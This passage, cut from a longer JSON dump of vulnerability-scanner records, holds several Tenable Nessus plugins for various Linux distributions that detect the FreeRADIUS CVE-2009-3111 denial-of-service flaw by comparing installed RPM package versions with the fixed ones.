value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:40:46", "references": ["http://www.nessus.org/u?06a7b8b4"], "pluginID": "60666", "edition": 2, "description": "CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.", "reporter": "Tenable", "published": "2012-08-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Scientific Linux Security Update : freeradius on SL5.x i386/x86_64", "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "modified": "2014-08-16T00:00:00", "id": "SL_20090917_FREERADIUS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60666);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2014/08/16 19:42:08 $\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n\n script_name(english:\"Scientific Linux Security Update : freeradius on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes\nwith zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind0909&L=scientific-linux-errata&T=0&P=1083\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?06a7b8b4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2014 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:40:42", "references": ["https://oss.oracle.com/pipermail/el-errata/2009-September/001156.html"], "pluginID": "67926", "edition": 2, "description": "From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote Authentication Dial In User Service (RADIUS) server, designed to allow centralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded specific RADIUS attributes from RADIUS packets. A remote attacker could use this flaw to crash the RADIUS daemon (radiusd) via a specially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, radiusd will be restarted automatically.", "reporter": "Tenable", "published": "2013-07-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "Oracle Linux 5 : freeradius (ELSA-2009-1451)", "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "cpe": ["p-cpe:/a:oracle:linux:freeradius-postgresql", "p-cpe:/a:oracle:linux:freeradius", "p-cpe:/a:oracle:linux:freeradius-unixODBC", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:freeradius-mysql"], "modified": "2015-12-01T00:00:00", "id": "ORACLELINUX_ELSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67926", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# Oracle Linux Security Advisory ELSA-2009-1451 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67926);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/12/01 16:49:12 $\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"Oracle Linux 5 : freeradius (ELSA-2009-1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-September/001156.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:32:52", "references": [], "pluginID": "42049", "description": "This update of freeradius fixes a remote denial-of-service bug in function rad_decode() which can be triggered by zero-length Tunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 2, "reporter": "Tenable", "published": "2009-10-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "openSUSE 10 Security Update : freeradius (freeradius-6496)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:freeradius-dialupadmin", "p-cpe:/a:novell:opensuse:freeradius", "p-cpe:/a:novell:opensuse:freeradius-devel"], "modified": "2014-06-13T00:00:00", "id": "SUSE_FREERADIUS-6496.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42049", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update freeradius-6496.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42049);\n script_version (\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2014/06/13 20:06:07 $\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"openSUSE 10 Security Update : freeradius (freeradius-6496)\");\n script_summary(english:\"Check for the freeradius-6496 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freeradius-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:freeradius-dialupadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"freeradius-1.1.6-47.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"freeradius-devel-1.1.6-47.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"freeradius-dialupadmin-1.1.6-47.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-29T13:42:21", "references": ["http://support.novell.com/security/cve/CVE-2009-3111.html"], "pluginID": "41966", "description": "This update of freeradius fixes a remote denial-of-service bug in function rad_decode() which can be triggered by zero-length Tunnel-Password attributes to make radiusd crash. (CVE-2009-3111)", "edition": 2, "reporter": "Tenable", "published": "2009-10-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "cpe": ["cpe:/o:suse:suse_linux"], "modified": "2012-05-17T00:00:00", "id": "SUSE_FREERADIUS-6499.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41966", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41966);\n script_version (\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:05:46 $\");\n\n script_cve_id(\"CVE-2009-3111\");\n\n script_name(english:\"SuSE 10 Security Update : freeradius (ZYPP Patch Number 6499)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of freeradius fixes a remote denial-of-service bug in\nfunction rad_decode() which can be triggered by zero-length\nTunnel-Password attributes to make radiusd crash. (CVE-2009-3111)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3111.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6499.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-1.1.0-19.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"freeradius-devel-1.1.0-19.14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-02T07:59:07", "references": [], "pluginID": "43851", "description": "A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes. NOTE: this is a regression error related to CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers.", "edition": 3, "reporter": "Tenable", "published": "2010-01-12T00:00:00", "title": "Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64freeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-devel", "p-cpe:/a:mandriva:linux:libfreeradius1", "p-cpe:/a:mandriva:linux:libfreeradius1-ldap", "p-cpe:/a:mandriva:linux:lib64freeradius1-krb5", "p-cpe:/a:mandriva:linux:lib64freeradius1", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:freeradius", "p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql", "p-cpe:/a:mandriva:linux:lib64freeradius1-mysql", "p-cpe:/a:mandriva:linux:libfreeradius1-krb5", "p-cpe:/a:mandriva:linux:libfreeradius1-postgresql", "p-cpe:/a:mandriva:linux:libfreeradius1-devel", "p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-unixODBC", "p-cpe:/a:mandriva:linux:libfreeradius1-mysql"], "id": "MANDRIVA_MDVSA-2009-227.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43851", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:227. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43851);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/19 20:59:16\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"MDVSA\", value:\"2009:227-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : freeradius (MDVSA-2009:227-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in freeradius :\n\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967 (CVE-2009-3111).\n\nThis update provides a solution to this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64freeradius1-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libfreeradius1-postgresql\");\n script_set_attribute(attribute:\"cpe\", 